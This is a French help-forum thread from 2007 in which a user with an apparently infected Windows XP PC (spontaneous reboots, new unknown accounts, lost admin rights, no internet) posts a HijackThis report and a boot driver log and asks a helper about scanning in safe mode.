O4 - HKCU\..\Run: [H/PC Connection Agent] "C:\Program Files\Microsoft ActiveSync\Wcescomm.exe"

O4 - HKCU\..\Run: [EPSON Stylus DX4800 Series] C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_FATIADE.EXE /P26 "EPSON Stylus DX4800 Series" /M "Stylus DX4800" /EF "HKCU"

O4 - HKCU\..\Run: [CD_Updater] C:\Program Files\Carpe Diem\video-complete\CDUpdater.exe CD_UPDATER

O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe

O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe

O4 - Global Startup: Rappels du Calendrier Microsoft Works.lnk = ?

O4 - Global Startup: Utilitaire réseau pour SAGEM Wi-Fi 11g USB adapter.lnk = ?

O7 - HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegedit=1

O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MI1933~1\OFFICE11\EXCEL.EXE/3000

O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_11\bin\ssv.dll

O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_11\bin\ssv.dll

O9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MI3AA1~1\INetRepl.dll

O9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MI3AA1~1\INetRepl.dll

O9 - Extra 'Tools' menuitem: Créer un Favori de l'appareil mobile... - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MI3AA1~1\INetRepl.dll

O9 - Extra button: Recherche - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MI1933~1\OFFICE11\REFIEBAR.DLL

O9 - Extra button: Organise-notes - {9455301C-CF6B-11D3-A266-00C04F689C50} - C:\Program Files\Fichiers communs\Microsoft Shared\Reference 2001\EROProj.dll

O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)

O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)

O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe

O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe

O11 - Options group: [iNTERNATIONAL] International*

O17 - HKLM\System\CCS\Services\Tcpip\..\{65F5B42C-EB4D-4C06-89D1-99BED72D9AE8}: NameServer = 208.67.222.222,208.67.220.220

O17 - HKLM\System\CCS\Services\Tcpip\..\{CC5EE862-3E1A-4215-8035-F2EB6C7BF8F2}: NameServer = 208.67.222.222,208.67.220.220

O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - "C:\PROGRA~1\MSNMES~1\msgrapp.dll" (file missing)

O20 - Winlogon Notify: klogon - C:\WINDOWS\system32\klogon.dll

O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\SYSTEM32\WgaLogon.dll

O21 - SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll

O23 - Service: AVG Anti-Spyware Guard - Anti-Malware Development a.s. - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe

O23 - Service: Active Virus Shield (AVP) - Unknown owner - C:\Program Files\AOL\Active Virus Shield\avp.exe" -r (file missing)

O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe

O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe

Pour ce qui est de la connexion internet, une fenêtre s'ouvre me demandant la clef wep mais le temps que je la saisisse le micro s'était relancé. dois-je refaire une tentative ou directement essayé ton indication avec

"Menu Démarrer / exectuer et tape : netsh winsock reset"

Encore merci de ton attention et de ton aide...

le 12 mai 2007

Heu........

Je peux pas faire de scan en ligne !!!

Je n'arrive pas a me connecter avec le pc infecté

Pour nos discussion j'utilise mon pc portable

Heu........

Je peux pas faire de scan en ligne !!!

Je n'arrive pas a me connecter avec le pc infecté

Pour nos discussions j'utilise mon pc portable

le 12 mai 2007

Voilà qui est fait :

Service Pack 2 5 12 2007 15:39:55.500

Pilote charg‚ \WINDOWS\system32\ntoskrnl.exe

Pilote charg‚ \WINDOWS\system32\hal.dll

Pilote charg‚ \WINDOWS\system32\KDCOM.DLL

Pilote charg‚ \WINDOWS\system32\BOOTVID.dll

Pilote charg‚ ACPI.sys

Pilote charg‚ \WINDOWS\System32\DRIVERS\WMILIB.SYS

Pilote charg‚ pci.sys

Pilote charg‚ isapnp.sys

Pilote charg‚ ohci1394.sys

Pilote charg‚ \WINDOWS\System32\DRIVERS\1394BUS.SYS

Pilote charg‚ intelide.sys

Pilote charg‚ \WINDOWS\System32\DRIVERS\PCIIDEX.SYS

Pilote charg‚ MountMgr.sys

Pilote charg‚ ftdisk.sys

Pilote charg‚ PartMgr.sys

Pilote charg‚ VolSnap.sys

Pilote charg‚ atapi.sys

Pilote charg‚ disk.sys

Pilote charg‚ \WINDOWS\System32\DRIVERS\CLASSPNP.SYS

Pilote charg‚ fltmgr.sys

Pilote charg‚ sr.sys

Pilote charg‚ KSecDD.sys

Pilote charg‚ WudfPf.sys

Pilote charg‚ Ntfs.sys

Pilote charg‚ NDIS.sys

Pilote charg‚ Mup.sys

Pilote charg‚ kl1.sys

Pilote charg‚ \WINDOWS\system32\drivers\TDI.SYS

Pilote charg‚ agp440.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\nic1394.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\processr.sys

Pilote charg‚ \SystemRoot\system32\DRIVERS\nv4_mini.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\RTL8139.SYS

Pilote charg‚ \SystemRoot\system32\drivers\cmaudio.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\cdrom.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\redbook.sys

Pilote charg‚ \SystemRoot\system32\DRIVERS\imapi.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\usbuhci.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\fdc.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\serial.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\serenum.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\parport.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\i8042prt.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\mouclass.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\kbdclass.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\gameenum.sys

Pilote charg‚ \SystemRoot\system32\drivers\msmpu401.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\audstub.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\rasl2tp.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\ndistapi.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\ndiswan.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\raspppoe.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\raspptp.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\msgpc.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\psched.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\ptilink.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\raspti.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\termdd.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\swenum.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\update.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\mssmbios.sys

Pilote charg‚ \SystemRoot\System32\Drivers\NDProxy.SYS

Le pilote n'a pas ‚t‚ charg‚ \SystemRoot\System32\Drivers\NDProxy.SYS

Pilote charg‚ \SystemRoot\System32\DRIVERS\usbhub.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\flpydisk.sys

Le pilote n'a pas ‚t‚ charg‚ \SystemRoot\System32\Drivers\lbrtfdc.SYS

Le pilote n'a pas ‚t‚ charg‚ \SystemRoot\System32\Drivers\Sfloppy.SYS

Le pilote n'a pas ‚t‚ charg‚ \SystemRoot\System32\Drivers\i2omgmt.SYS

Le pilote n'a pas ‚t‚ charg‚ \SystemRoot\System32\Drivers\Changer.SYS

Le pilote n'a pas ‚t‚ charg‚ \SystemRoot\System32\Drivers\Cdaudio.SYS

Pilote charg‚ \SystemRoot\System32\Drivers\Fs_Rec.SYS

Pilote charg‚ \SystemRoot\System32\Drivers\Null.SYS

Pilote charg‚ \SystemRoot\System32\Drivers\Beep.SYS

Pilote charg‚ \SystemRoot\System32\DRIVERS\AvgAsCln.sys

Pilote charg‚ \SystemRoot\System32\drivers\vga.sys

Pilote charg‚ \SystemRoot\System32\Drivers\mnmdd.SYS

Pilote charg‚ \SystemRoot\System32\DRIVERS\RDPCDD.sys

Pilote charg‚ \SystemRoot\System32\Drivers\Msfs.SYS

Pilote charg‚ \SystemRoot\System32\Drivers\Npfs.SYS

Pilote charg‚ \SystemRoot\System32\DRIVERS\rasacd.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\ipsec.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\tcpip.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\netbt.sys

Pilote charg‚ \SystemRoot\System32\drivers\afd.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\netbios.sys

Le pilote n'a pas ‚t‚ charg‚ \SystemRoot\System32\Drivers\PCIDump.SYS

Pilote charg‚ \SystemRoot\System32\DRIVERS\rdbss.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\mrxsmb.sys

Pilote charg‚ \??\C:\WINDOWS\system32\drivers\klif.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\ipnat.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\wanarp.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\arp1394.sys

Pilote charg‚ \SystemRoot\System32\Drivers\Fips.SYS

Pilote charg‚ \SystemRoot\system32\DRIVERS\usbccgp.sys

Pilote charg‚ \??\C:\Program Files\Fichiers communs\Symantec Shared\EENGINE\eeCtrl.sys

Pilote charg‚ \??\C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.sys

Pilote charg‚ \SystemRoot\system32\DRIVERS\WlanBZXP.sys

Pilote charg‚ \SystemRoot\system32\DRIVERS\CamDrL21.sys

Pilote charg‚ \SystemRoot\system32\drivers\usbaudio.sys

Pilote charg‚ \SystemRoot\System32\Drivers\Fastfat.SYS

Le pilote n'a pas ‚t‚ charg‚ \SystemRoot\System32\Drivers\adildr.sys

Pilote charg‚ \SystemRoot\system32\DRIVERS\nwlnkipx.sys

Pilote charg‚ \SystemRoot\system32\DRIVERS\nwlnknb.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\ndisuio.sys

Le pilote n'a pas ‚t‚ charg‚ \SystemRoot\System32\DRIVERS\rdbss.sys

Le pilote n'a pas ‚t‚ charg‚ \SystemRoot\System32\DRIVERS\mrxsmb.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\mrxdav.sys

Pilote charg‚ \SystemRoot\System32\Drivers\ParVdm.SYS

Le pilote n'a pas ‚t‚ charg‚ \SystemRoot\System32\Drivers\Ca533av.sys

Pilote charg‚ \SystemRoot\system32\DRIVERS\nwlnkspx.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\srv.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\secdrv.sys

Pilote charg‚ \SystemRoot\system32\drivers\wdmaud.sys

Pilote charg‚ \SystemRoot\system32\drivers\sysaudio.sys

Pilote charg‚ \SystemRoot\system32\drivers\splitter.sys

Pilote charg‚ \SystemRoot\system32\drivers\aec.sys

Pilote charg‚ \SystemRoot\system32\drivers\swmidi.sys

Pilote charg‚ \SystemRoot\system32\drivers\DMusic.sys

Pilote charg‚ \SystemRoot\system32\drivers\kmixer.sys

Pilote charg‚ \SystemRoot\system32\drivers\drmkaud.sys

Le pilote n'a pas ‚t‚ charg‚ \SystemRoot\System32\DRIVERS\ipnat.sys

Pilote charg‚ \SystemRoot\System32\Drivers\Cdfs.SYS

Pilote charg‚ \SystemRoot\System32\Drivers\HTTP.sys

Pilote charg‚ \SystemRoot\System32\DRIVERS\USBSTOR.SYS

Pilote charg‚ \SystemRoot\system32\drivers\kmixer.sys

J'espère que ça te causera plus qu'à moi !!!!

le 12 mai 2007

Bon, c'est ce que je craignais,

Je ne peux pas faire un scan avec DiagHelp.

L'ordinateur redemarre avant la fin !!!

le 12 mai 2007

Bonjour Malekal morte

Et merci de ton attention

Juste une petite question avant de commencer le combat avec la machine,

Est-ce que je peux suivre tes indications en mode sans echec ?

Car sinon, je n'aurais absolument pas le temps de faire un scan....

le 12 mai 2007

Bonjour à toutes et à tous,

J'ai un PC fonctionnant sous Windows XP et utilisant IE.

Antivirus : Active Virus Shield

Antispyware : AVG antispyware + Ad Aware Se + Ccleaner.

Hier, sans crier garde, mon pc s'est éteind puis s'est rallumé tout seul.

Il a créé deux comptes utilisateurs (Nommés ADSL et nombre). Ceux-ci sont protégés par mot de passe.

Je ne suis plus administrateur de mon PC.

Toutefois j'ai toujours accès à ma session. Cependant, je ne peux plus me connecter à internet.

Et, enfin, ma session s'arrête au bout de deux à trois minutes car l'ordinateur redémarre.

J'ai lancé, en mode sans échec, des scans avec mon antivirus, AVG antispyware, Ccleaner et même MRT.

Mis a part quelques coockies, rien a été trouvé.

J'ai donc installé Hijackthis, à l'aide d'une clé usb et voici le rapport :

Logfile of HijackThis v1.99.1

Scan saved at 12:34:39, on 12/05/2007

Platform: Windows XP SP2 (WinNT 5.01.2600)

MSIE: Internet Explorer v7.00 (7.00.6000.16441)

Running processes:

C:\WINDOWS\System32\smss.exe

C:\WINDOWS\system32\winlogon.exe

C:\WINDOWS\system32\services.exe

C:\WINDOWS\system32\lsass.exe

C:\WINDOWS\system32\svchost.exe

C:\WINDOWS\System32\svchost.exe

C:\WINDOWS\system32\svchost.exe

C:\WINDOWS\system32\spoolsv.exe

C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe

C:\Program Files\AOL\Active Virus Shield\avp.exe

C:\WINDOWS\system32\nvsvc32.exe

C:\WINDOWS\System32\svchost.exe

C:\WINDOWS\system32\MsPMSPSv.exe

C:\Program Files\QuickTime\qttask.exe

C:\WINDOWS\Mixer.exe

C:\WINDOWS\system32\LVCOMSX.EXE

C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe

C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_FATIADE.EXE

C:\Program Files\Java\jre1.5.0_11\bin\jusched.exe

C:\Program Files\AOL\Active Virus Shield\avp.exe

C:\Program Files\Logitech\Video\LogiTray.exe

C:\WINDOWS\system32\cmd.exe

C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe

C:\Program Files\Logitech\Video\FxSvr2.exe

C:\WINDOWS\explorer.exe

C:\WINDOWS\system32\ping.exe

C:\Program Files\Hijackthis Version Française\hijackthis vf.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://webmail.dbmail.com/webmail/fr_FR/lo...ml?LOGIN1=panow

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896

R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://register.libertysurf.com/dispatch/d...MKTG=PFMPFRPAB7

R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = localhost

R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens

O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll

O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_11\bin\ssv.dll

O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime

O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup

O4 - HKLM\..\Run: [C-Media Mixer] Mixer.exe /startup

O4 - HKLM\..\Run: [WorksFUD] C:\Program Files\Microsoft Works\wkfud.exe

O4 - HKLM\..\Run: [Microsoft Works Portfolio] C:\Program Files\Microsoft Works\WksSb.exe /AllUsers

O4 - HKLM\..\Run: [Microsoft Works Update Detection] C:\Program Files\Microsoft Works\WkDetect.exe

O4 - HKLM\..\Run: [MSPluginSrvc] p3.exe

O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe

O4 - HKLM\..\Run: [nwiz] nwiz.exe /install

O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit

O4 - HKLM\..\Run: [LVCOMSX] C:\WINDOWS\system32\LVCOMSX.EXE

O4 - HKLM\..\Run: [LogitechVideoRepair] C:\Program Files\Logitech\Video\ISStart.exe

O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe" -osboot

O4 - HKLM\..\Run: [EPSON Stylus DX4800 Series] C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_FATIADE.EXE /P26 "EPSON Stylus DX4800 Series" /O6 "USB001" /M "Stylus DX4800"

O4 - HKLM\..\Run: [sunJavaUpdateSched] "C:\Program Files\Java\jre1.5.0_11\bin\jusched.exe"

O4 - HKLM\..\Run: [kav] "C:\Program Files\AOL\Active Virus Shield\avp.exe"

O4 - HKLM\..\Run: [rgnepuvwco] c:\windows\system32\rgnepuvwco.exe rgnepuvwco

O4 - HKLM\..\Run: [LogitechVideoTray] C:\Program Files\Logitech\Video\LogiTray.exe

O4 - HKLM\..\Run: [Firewall] C:\WINDOWS\Navnet.exe

O4 - HKLM\..\Run: [!AVG Anti-Spyware] "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe" /minimized

O4 - HKLM\..\RunServices: [MSPluginSrvc] p3.exe

O4 - HKLM\..\RunServices: [Firewall] C:\WINDOWS\Navnet.exe

O4 - HKCU\..\Run: [MSPluginSrvc] p3.exe